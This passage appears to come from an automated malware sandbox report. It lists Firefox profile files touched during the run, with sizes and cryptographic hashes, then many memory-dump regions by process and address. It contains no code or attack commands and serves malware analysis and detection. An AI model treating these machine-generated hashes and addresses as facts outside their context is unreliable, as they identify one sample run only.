                                                                    3be72da2714e09635d7001e7f642872b5c6f143e5b217ef806ddd7caa284e64c310a8cdcd9ab970afe2b372b20db69fcf77ac57614b6a3f8e5837bc93a1c6279

                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\prefs.js

                                                                    Filesize

                                                                    6KB

                                                                    MD5

                                                                    50369b5da620687f06eaa2d579bca024

                                                                    SHA1

                                                                    9b697590d2ca3357ed9d8bed217cb4e31427996a

                                                                    SHA256

                                                                    70baa43af3590c9e247f46c9508b27fa48b0b91e0f868c22717d57a641195fb3

                                                                    SHA512

                                                                    b203879ae20a0576ac74873e0b4fcbff2698260d1c4540b4564554362f7a19a50332e664133b0077d0e9cba9e23cbb79186f117f2648a4279dd18cddaf6023eb

                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\sessionstore-backups\recovery.jsonlz4

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    d995ad6e86d273151beb414a16044fb3

                                                                    SHA1

                                                                    1a7f8f8716d9d76c51ad8749f039bff485fe4e0e

                                                                    SHA256

                                                                    bc8515a4fb906e57df18a935e50ebd2ca4e5c5f04403565d90a463214b754c5c

                                                                    SHA512

                                                                    cfae6f93ef3a16a064d5a6a80636ecf92ee2c8fa717f0b61833d05adfc28a43a64cc50f1b315b3e050444fed9b2d47545bd853acd49d8599c7c25b3fdb9ae731

                                                                  • memory/216-7288-0x0000000000400000-0x0000000000685000-memory.dmp

                                                                    Filesize

                                                                    2.5MB

                                                                  • memory/228-7248-0x0000000075D40000-0x0000000075F55000-memory.dmp

                                                                    Filesize

                                                                    2.1MB

                                                                  • memory/228-7245-0x0000000000BA0000-0x0000000000FA0000-memory.dmp

                                                                    Filesize

                                                                    4.0MB

                                                                  • memory/228-7243-0x0000000000650000-0x000000000065A000-memory.dmp

                                                                    Filesize

                                                                    40KB

                                                                  • memory/228-7246-0x00007FFFFB070000-0x00007FFFFB265000-memory.dmp

                                                                    Filesize

                                                                    2.0MB

                                                                  • memory/1344-32-0x00000000009F0000-0x0000000000EA8000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/1344-47-0x00000000009F0000-0x0000000000EA8000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/1384-189-0x00007FF74CA10000-0x00007FF74D09D000-memory.dmp

                                                                    Filesize

                                                                    6.6MB

                                                                  • memory/1384-190-0x00007FF74CA10000-0x00007FF74D09D000-memory.dmp

                                                                    Filesize

                                                                    6.6MB

                                                                  • memory/2160-5121-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                    Filesize

                                                                    400KB

                                                                  • memory/2160-5120-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                    Filesize

                                                                    400KB

                                                                  • memory/2756-7339-0x0000000000850000-0x00000000009D8000-memory.dmp

                                                                    Filesize

                                                                    1.5MB

                                                                  • memory/2756-7338-0x0000000000850000-0x00000000009D8000-memory.dmp

                                                                    Filesize

                                                                    1.5MB

                                                                  • memory/2756-7337-0x0000000000850000-0x00000000009D8000-memory.dmp

                                                                    Filesize

                                                                    1.5MB

                                                                  • memory/2756-7335-0x0000000140000000-0x0000000140455000-memory.dmp

                                                                    Filesize

                                                                    4.3MB

                                                                  • memory/3232-191-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/3232-48-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/3232-6561-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/3232-7208-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/3232-212-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/3232-174-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/3232-713-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/3232-651-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/3232-1812-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/3232-7316-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/3232-7267-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/3232-95-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/3232-80-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/3232-79-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/3724-7292-0x0000029B27FD0000-0x0000029B28041000-memory.dmp

                                                                    Filesize

                                                                    452KB

                                                                  • memory/3724-7301-0x0000029B27FD0000-0x0000029B28041000-memory.dmp

                                                                    Filesize

                                                                    452KB

                                                                  • memory/3724-7300-0x0000029B27FD0000-0x0000029B28041000-memory.dmp

                                                                    Filesize

                                                                    452KB

                                                                  • memory/3724-7299-0x0000029B27FD0000-0x0000029B28041000-memory.dmp

                                                                    Filesize

                                                                    452KB

                                                                  • memory/3724-7291-0x00000000004A0000-0x00000000004A2000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/3964-653-0x00000000009A0000-0x0000000000DCC000-memory.dmp

                                                                    Filesize

                                                                    4.2MB

                                                                  • memory/3964-544-0x00000000009A0000-0x0000000000DCC000-memory.dmp

                                                                    Filesize

                                                                    4.2MB

                                                                  • memory/3964-534-0x00000000009A0000-0x0000000000DCC000-memory.dmp

                                                                    Filesize

                                                                    4.2MB

                                                                  • memory/3964-255-0x00000000009A0000-0x0000000000DCC000-memory.dmp

                                                                    Filesize

                                                                    4.2MB

                                                                  • memory/3964-673-0x00000000009A0000-0x0000000000DCC000-memory.dmp

                                                                    Filesize

                                                                    4.2MB

                                                                  • memory/4528-649-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                    Filesize

                                                                    400KB

                                                                  • memory/4528-650-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                    Filesize

                                                                    400KB

                                                                  • memory/4652-172-0x0000000000F00000-0x00000000013B1000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/4652-173-0x0000000000F00000-0x00000000013B1000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/4716-1096-0x0000000000400000-0x00000000008AB000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/4716-7315-0x0000000000400000-0x00000000008AB000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/4716-6560-0x0000000000400000-0x00000000008AB000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/4716-7254-0x0000000000400000-0x00000000008AB000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/4716-6559-0x0000000000400000-0x00000000008AB000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/4716-193-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/4716-194-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/4716-7194-0x0000000000400000-0x00000000008AB000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/4716-1184-0x0000000000400000-0x00000000008AB000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/4744-19-0x0000000007900000-0x0000000007F7A000-memory.dmp

                                                                    Filesize

                                                                    6.5MB

                                                                  • memory/4744-17-0x00000000061E0000-0x00000000061FE000-memory.dmp

                                                                    Filesize

                                                                    120KB

                                                                  • memory/4744-4-0x0000000005900000-0x0000000005922000-memory.dmp

                                                                    Filesize

                                                                    136KB

                                                                  • memory/4744-23-0x0000000007630000-0x0000000007652000-memory.dmp

                                                                    Filesize

                                                                    136KB

                                                                  • memory/4744-22-0x00000000076A0000-0x0000000007736000-memory.dmp

                                                                    Filesize

                                                                    600KB

                                                                  • memory/4744-6-0x0000000005AD0000-0x0000000005B36000-memory.dmp

                                                                    Filesize

                                                                    408KB

                                                                  • memory/4744-20-0x0000000006700000-0x000000000671A000-memory.dmp

                                                                    Filesize

                                                                    104KB

                                                                  • memory/4744-5-0x0000000005A60000-0x0000000005AC6000-memory.dmp

                                                                    Filesize

                                                                    408KB

                                                                  • memory/4744-3-0x0000000005270000-0x0000000005898000-memory.dmp

                                                                    Filesize

                                                                    6.2MB

                                                                  • memory/4744-24-0x0000000008530000-0x0000000008AD4000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/4744-16-0x0000000005CC0000-0x0000000006014000-memory.dmp

                                                                    Filesize

                                                                    3.3MB

                                                                  • memory/4744-18-0x0000000006280000-0x00000000062CC000-memory.dmp

                                                                    Filesize

                                                                    304KB

                                                                  • memory/4744-2-0x00000000010D0000-0x0000000001106000-memory.dmp

                                                                    Filesize

                                                                    216KB

                                                                  • memory/5172-7209-0x0000000000350000-0x00000000007F2000-memory.dmp

                                                                    Filesize

                                                                    4.6MB

                                                                  • memory/5172-7207-0x0000000000350000-0x00000000007F2000-memory.dmp

                                                                    Filesize

                                                                    4.6MB

                                                                  • memory/5304-7212-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/5304-7214-0x00000000001B0000-0x0000000000668000-memory.dmp

                                                                    Filesize

                                                                    4.7MB

                                                                  • memory/5316-7242-0x0000000075D40000-0x0000000075F55000-memory.dmp

                                                                    Filesize

                                                                    2.1MB

                                                                  • memory/5316-7239-0x0000000002C10000-0x0000000003010000-memory.dmp

                                                                    Filesize

                                                                    4.0MB

                                                                  • memory/5316-7237-0x0000000000400000-0x000000000047F000-memory.dmp

                                                                    Filesize

                                                                    508KB

                                                                  • memory/5316-7236-0x0000000000400000-0x000000000047F000-memory.dmp

                                                                    Filesize

                                                                    508KB

                                                                  • memory/5316-7238-0x0000000002C10000-0x0000000003010000-memory.dmp

                                                                    Filesize

                                                                    4.0MB

                                                                  • memory/5316-7240-0x00007FFFFB070000-0x00007FFFFB265000-memory.dmp

                                                                    Filesize

                                                                    2.0MB

                                                                  • memory/5704-7269-0x0000000000400000-0x0000000000463000-memory.dmp

                                                                    Filesize

                                                                    396KB

                                                                  • memory/5704-7268-0x0000000000400000-0x0000000000463000-memory.dmp

                                                                    Filesize

                                                                    396KB

                                                                  • memory/5776-7251-0x00000000001C0000-0x0000000000224000-memory.dmp

                                                                    Filesize

                                                                    400KB

                                                                  • memory/5776-7252-0x00000000001C0000-0x0000000000224000-memory.dmp

                                                                    Filesize

                                                                    400KB

                                                                  • memory/5776-7253-0x00000000001C0000-0x0000000000224000-memory.dmp

                                                                    Filesize

                                                                    400KB

                                                                  • memory/5776-7250-0x00000000001C0000-0x0000000000224000-memory.dmp

                                                                    Filesize

                                                                    400KB

                                                                  • memory/5776-7249-0x00000000001C0000-0x0000000000224000-memory.dmp

                                                                    Filesize

                                                                    400KB

                                                                  • memory/5896-115-0x0000000005330000-0x00000000054F2000-memory.dmp

                                                                    Filesize

                                                                    1.8MB

                                                                  • memory/5896-117-0x0000000006E70000-0x0000000006F02000-memory.dmp

                                                                    Filesize

                                                                    584KB

                                                                  • memory/5896-116-0x00000000062B0000-0x00000000067DC000-memory.dmp

                                                                    Filesize

                                                                    5.2MB

                                                                  • memory/5896-114-0x0000000005140000-0x0000000005152000-memory.dmp

                                                                    Filesize

                                                                    72KB

                                                                  • memory/5896-113-0x0000000000930000-0x000000000096C000-memory.dmp

                                                                    Filesize

                                                                    240KB

                                                                  • memory/6096-7302-0x00000185EE850000-0x00000185EE872000-memory.dmp

                                                                    Filesize

                                                                    136KB

                                                                  • memory/7232-27839-0x0000000000400000-0x0000000000E17000-memory.dmp

                                                                    Filesize

                                                                    10.1MB